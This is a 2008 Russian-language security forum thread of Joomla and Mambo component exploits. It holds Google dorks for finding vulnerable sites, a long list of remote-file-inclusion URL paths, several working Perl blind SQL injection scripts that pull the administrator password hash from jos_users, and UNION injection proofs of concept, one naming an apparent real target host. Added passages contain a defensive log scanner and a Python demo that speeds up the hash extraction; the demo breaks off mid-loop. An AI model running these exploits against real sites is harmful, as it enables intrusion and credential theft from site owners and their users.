Antichat is back online. The Antichat forum has returned and is open to users again; it covers security, programming, technology and more. New address: forum.antichat.xyz
Posted 23.05.2008, 20:21 by a user now marked Banned (registered 30.03.2007, 344 posts, reputation 2438)
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
Code:
###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# There are a lot of sites, but the exploit does not work on all of them; I found a lot.
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :
index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<name>garyscookbook</name>
<creationDate>4-9-2005</creationDate>
<author>Gerald Berger</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>gerald@vb-dozent.net</authorEmail>
<authorUrl>www.vb-dozent.net</authorUrl>
<version>1.1.1</version>
<description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>
Posted 29.05.2008, 09:15 by a user now marked Banned (registered 29.09.2007, 512 posts, reputation 1224)
Found this on my machine; no idea, might be old news.
Code:
Google Dork: inurl:"com_flyspray"
Append to site URL: /components/com_flyspray/startdown.php?file=shell
Google Dork: inurl:"com_admin"
Append to site URL: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
Google Dork: inurl:index.php?option=com_simpleboard
Append to site URL: /components/com_simpleboard/file_upload.php?sbp=shell
Google Dork: inurl:"com_hashcash"
Append to site URL: /components/com_hashcash/server.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_htmlarea3_xtd-c"
Append to site URL: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_sitemap"
Append to site URL: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_performs"
Append to site URL: components/com_performs/performs.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_forum"
Append to site URL: /components/com_forum/download.php?phpbb_root_path=
Google Dork: inurl:"com_pccookbook"
Append to site URL: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
Google Dork: inurl:index.php?option=com_extcalendar
Append to site URL: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
Google Dork: inurl:"minibb"
Append to site URL: components/minibb/index.php?absolute_path=shell
Google Dork: inurl:"com_smf"
Append to site URL: /components/com_smf/smf.php?mosConfig_absolute_path=
Append to site URL (2): /modules/mod_calendar.php?absolute_path=shell
Google Dork: inurl:"com_pollxt"
Append to site URL: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_loudmounth"
Append to site URL: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_videodb"
Append to site URL: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell
Google Dork: inurl:index.php?option=com_pcchess
Append to site URL: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_multibanners"
Append to site URL: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_a6mambohelpdesk"
Append to site URL: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell
Google Dork: inurl:"com_colophon"
Append to site URL: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_mgm"
Append to site URL: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_mambatstaff"
Append to site URL: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_securityimages"
Append to site URL: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
Append to site URL (2): /components/com_securityimages/lang.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_artlinks"
Append to site URL: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_galleria"
Append to site URL: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_akocomment"
Append to site URL: /akocomments.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_cropimage"
Append to site URL: administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
Google Dork: inurl:"com_kochsuite"
Append to site URL: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_comprofiler"
Append to site URL: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_zoom"
Append to site URL: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Append to site URL (2): /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_serverstat"
Append to site URL: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell
Google Dork: inurl:"com_fm"
Append to site URL: components/com_fm/fm.install.php?lm_absolute_path=shell
Google Dork: inurl:com_mambelfish
Append to site URL: administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_lmo
Append to site URL: components/com_lmo/lmo.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_linkdirectory
Append to site URL: administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_mtree
Append to site URL: components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_jim
Append to site URL: administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_webring
Append to site URL: administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
Google Dork: inurl:com_remository
Append to site URL: administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Google Dork: inurl:com_babackup
Append to site URL: administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_lurm_constructor
Append to site URL: administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
Google Dork: inurl:com_mambowiki
Append to site URL: components/com_mambowiki/MamboLogin.php?IP=shell
Google Dork: inurl:com_a6mambocredits
Append to site URL: administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
Google Dork: inurl:com_phpshop
Append to site URL: administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_cpg
Append to site URL: components/com_cpg/cpg.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_moodle
Append to site URL: components/com_moodle/moodle.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_extended_registration
Append to site URL: components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_mospray
Append to site URL: components/com_mospray/scripts/admin.php?basedir=shell
Google Dork: inurl:com_bayesiannaivefilter
Append to site URL: /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_uhp
Append to site URL: /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_peoplebook
Append to site URL: /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_mmp
Append to site URL: /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_reporter
Append to site URL: /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_madeira
Append to site URL: /components/com_madeira/img.php?url=shell
Google Dork: inurl:com_jd-wiki
Append to site URL: /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
Google Dork: inurl:com_bsq_sitestats
Append to site URL: /components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Append to site URL (2): /com_bsq_sitestats/external/rssfeed.php?baseDir=shell
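The list above is a catalogue of register_globals-era remote file inclusion points (a client-supplied mosConfig_absolute_path or similar variable ends up in an include), and the other posts in this thread carry UNION and boolean-blind SQL injections against the same CMS family. As an added example, not code from any post in this thread, the following Python script scans Apache-style access-log lines for those three request shapes. The log lines, IP addresses and hostnames are constructed for the demonstration; the parameter names in OVERRIDE_PARAMS are taken from the paths listed above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined-log format; not taken from any real server.
SAMPLE_LOG = r"""
203.0.113.7 - - [29/May/2008:09:15:01 +0000] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.0.113.9/s.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [29/May/2008:09:15:02 +0000] "GET /index.php?option=com_garyscookbook&func=detail&id=-666/**/union+select/**/0,0,password,0+from%2F%2A%2A%2Fmos_users/* HTTP/1.0" 200 7712 "-" "Mozilla/4.0"
203.0.113.7 - - [29/May/2008:09:15:03 +0000] "GET /index.php?option=com_mycontent&task=view&id=10%20and%20(SUBSTRING((SELECT%20password%20FROM%20jos_users%20LIMIT%200,1%20),1,1))=CHAR(48) HTTP/1.0" 200 6120 "-" "libwww-perl/5.805"
198.51.100.4 - - [29/May/2008:09:16:10 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 9033 "-" "Mozilla/5.0"
198.51.100.4 - - [29/May/2008:09:16:11 +0000] "GET /components/com_smf/smf.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Variables the listed components expect from their own config or from an
# include path; a client has no business supplying them. Any mosConfig_* name
# is matched by prefix. Generic names such as 'url' or 'IP' are left out to
# keep false positives down.
OVERRIDE_PARAMS = {
    "absolute_path", "lm_absolute_path", "phpbb_root_path",
    "basedir", "component_dir", "cropimagedir", "sbp",
}
REMOTE_URL = re.compile(r"^\s*(https?|ftp)://", re.I)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)
BLIND_PROBE = re.compile(
    r"\b(and|or)\b\s*\(?\s*(ascii\s*\(\s*)?(substring|substr|mid)\s*\(", re.I
)


def classify_request(target):
    """Return the set of finding labels for one request target (path?query)."""
    findings = set()
    query = urlsplit(target).query
    # parse_qsl percent-decodes keys and values and turns '+' into a space,
    # so the attacker's encoding choices do not matter to the regexes below.
    params = parse_qsl(query, keep_blank_values=True)
    for key, value in params:
        k = key.lower()
        if k.startswith("mosconfig_") or k in OVERRIDE_PARAMS:
            findings.add("config-override")
            if REMOTE_URL.match(value):
                findings.add("rfi")
    # Inline comments are used in place of spaces (union/**/select); strip them
    # so "union select" is seen as written.
    values = SQL_COMMENT.sub(" ", " ".join(v for _, v in params))
    if UNION_SELECT.search(values):
        findings.add("sqli-union")
    if BLIND_PROBE.search(values):
        findings.add("sqli-blind")
    return findings


def scan_log(text):
    """Return (client_ip, sorted labels, target) for every suspicious request."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        labels = classify_request(m.group("target"))
        if labels:
            hits.append((m.group("ip"), sorted(labels), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, labels, target in scan_log(SAMPLE_LOG):
        print(ip, ",".join(labels), target)
```

The config-override label without rfi (a local path in mosConfig_absolute_path, as in the last sample line) is still worth alerting on: the parameter should never arrive from the client, and a local path is how an attacker points the include at a file they uploaded elsewhere.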
Posted 02.06.2008, 15:37 by a user now marked Banned (registered 10.11.2006, 829 posts, reputation 1559)
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl mycontent.pl host path <options> #\n";
print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -r Valid id #\n";
print " # Note: #\n";
print " # If the exploit failed #\n";
print " # Change 'regexp' value to the title of the page #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"r"})
{
$rid = $options{"r"};
}
# Recover the 32-character MD5 hash one position at a time: for each
# position try '0'..'9', then 'a'..'z', and print the first that matches.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
# Boolean probe: the page renders normally (and so contains $regexp) only
# when the injected comparison against the first jos_users password hash is true.
my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "E-mail";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl jobb.pl host path <options> #\n";
print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -f Forum id #\n";
print " # Note: #\n";
print " # If you need to change the match value so do it :D #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"f"})
{
$fid = $options{"f"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Announcements";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
milw0rm.com
Posted 03.06.2008, 01:11 by a user now marked Banned (registered 30.03.2007, 344 posts, reputation 2438)
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component acctexp Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl acctexp.pl host path <options> #\n";
print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -g usage id #\n";
print " # Note: #\n";
print " # Don't forget to change the match if you have to do it :)#\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $gid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"g"})
{
$gid = $options{"g"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $gid = shift; # usage id; the query below reads this parameter rather than the file-scoped global
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Verify Password";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
Posted 04.06.2008, 20:22 by a user now marked Banned (registered 19.10.2007, 152 posts, reputation 415)
Joomla Component jotloader <= 1.2.1.a Blind SQL injection
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component jotloader Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Contact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:com_jotloader o\n";
print " o Usage: perl jotloader.pl host path <options> o\n";
print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n";
print " o o\n";
print " o Options: o\n";
print " o -c valid cid id o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $cid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"c"})
{
$cid = $options{"c"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $cid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "files.download";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-04]
Posted 05.06.2008, 15:37 by a Members of Antichat - Level 5 user (registered 24.10.2007, 256 posts, reputation 1174)
Joomla Component EasyBook 1.1 SQL Injection Exploit
Code:
#!/usr/bin/perl
use IO::Socket;
use strict;
##### INFO##############################
# Example: #
# Host: artsbymonique.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################
print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";
print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);
my ($socket,$lhs,$l,$h,$s);
# UNION injection through the gbid POST parameter; username:hash:salt is
# wrapped in ':::' markers so it can be picked out of the response body.
my $body = "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md";
$socket = IO::Socket::INET->new("$host:80") || die("Can't connect!");
# Content-Length is derived from the body; the hard-coded 214 only held for a 32-character md.
print $socket "POST /index.php HTTP/1.0\r\n".
"Host: www.$host\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($body)."\r\n\r\n".
$body;
# Read every response line; reading two lines per iteration could skip the
# one carrying the markers.
while($s = <$socket>)
{
if($s=~/:::(.+):::/){
$lhs = $1;
($l,$h,$s)=split(':',$lhs);
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
close $socket;
exit; }
}
die ("Exploit failed!");
POST only
Posted 05.06.2008, 16:12 by a user now marked Banned (registered 19.10.2007, 152 posts, reputation 415)
Joomla Component simpleshop <= 3.4 SQL injection
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_simpleshop
[*] Dork : inurl:com_simpleshop "catid"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
milw0rm.com [2008-06-05]
Posted 08.06.2008, 15:22 by a user now marked Banned (registered 30.03.2007, 344 posts, reputation 2438)
joomla Sql Injection Scanner V 1.0
http://beenuarora.com/code/joomsq.py
Posted 08.06.2008, 18:33 by a user now marked Banned (registered 19.10.2007, 152 posts, reputation 415)
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
Code:
/---------------------------------------------------------------\
\ /
/ Joomla Component GameQ Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
Posted 09.06.2008, 14:15 by a user with the rank Learner (registered 01.01.2008, 91 posts, reputation 143)
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Contact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:yvcomment o\n";
print " o Usage: perl yvcomment.pl host path <options> o\n";
print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n";
print " o o\n";
print " o Options: o\n";
print " o -a valid Article id o\n";
print " o Note: o\n";
print " o You can Change the match string by any content of the correct query o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "DateAndAuthor";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-08]
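The Perl scripts in this thread (mycontent, JooBB, acctexp, jotloader, yvcomment) all extract the first jos_users password hash with the same boolean oracle: a marker string appears on the page only when the injected comparison is true, and each of the 32 hash positions is probed with up to 36 requests ('0'..'9', then 'a'..'z'). The following Python example is added here and is not code from any of those posts. It rebuilds the vulnerable pattern against an in-memory SQLite table (a constructed stand-in for the Joomla component; the table contents, the 'E-mail' marker and the id value 10 are assumptions) and recovers the hash by bisecting each character's code point, which costs exactly 7 probes per position. SQLite's unicode()/substr() stand in for MySQL's ascii()/SUBSTRING(); mysql_probe() returns the equivalent MySQL payload for reference.

```python
import hashlib
import sqlite3

MARKER = "E-mail"  # text rendered only when the WHERE clause matched a row (assumed)
SAMPLE_HASH = hashlib.md5(b"correct horse").hexdigest()  # constructed sample hash


def build_vulnerable_app():
    """Constructed stand-in for the vulnerable component: an in-memory SQLite
    database plus a view handler that pastes the id parameter into SQL
    exactly the way the exploited components did. Returns the handler."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    db.execute("CREATE TABLE jos_content (id INTEGER, title TEXT, email TEXT)")
    db.execute("INSERT INTO jos_users VALUES (62, 'admin', ?)", (SAMPLE_HASH,))
    db.execute("INSERT INTO jos_content VALUES (10, 'Hello', 'admin@example.invalid')")

    def view(id_param):
        # The bug: string concatenation instead of a bound parameter.
        sql = "SELECT title, email FROM jos_content WHERE id = " + id_param
        row = db.execute(sql).fetchone()
        if row is None:
            return "<h1>Not found</h1>"
        return f"<h1>{row[0]}</h1><p>{MARKER}: {row[1]}</p>"

    return view


def mysql_probe(rid, position, threshold):
    """The probe in MySQL syntax, as the Perl scripts above would send it."""
    return (f"{rid} and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),"
            f"{position},1)) > {threshold}")


def sqlite_probe(rid, position, threshold):
    """Same question for SQLite, which has unicode()/substr() instead."""
    return (f"{rid} and (unicode(substr((SELECT password FROM jos_users LIMIT 1),"
            f"{position},1)) > {threshold})")


def oracle(view, rid, position, threshold):
    """One boolean question: is the code point of hash[position] > threshold?"""
    return MARKER in view(sqlite_probe(rid, position, threshold))


def extract_hash(view, rid, length=32):
    """Recover an MD5 hex digest character by character.

    Each code point is found by binary search over 0..127, so every position
    costs exactly 7 probes instead of up to 36 sequential guesses.
    Returns (hash, number_of_probes)."""
    recovered = []
    probes = 0
    for position in range(1, length + 1):
        lo, hi = 0, 127  # invariant: the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probes += 1
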